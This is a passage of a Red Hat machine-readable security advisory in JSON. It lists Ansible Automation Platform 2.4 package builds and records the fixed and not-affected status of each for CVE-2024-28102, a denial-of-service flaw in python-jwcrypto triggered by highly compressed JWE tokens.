"name": "automation-controller-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
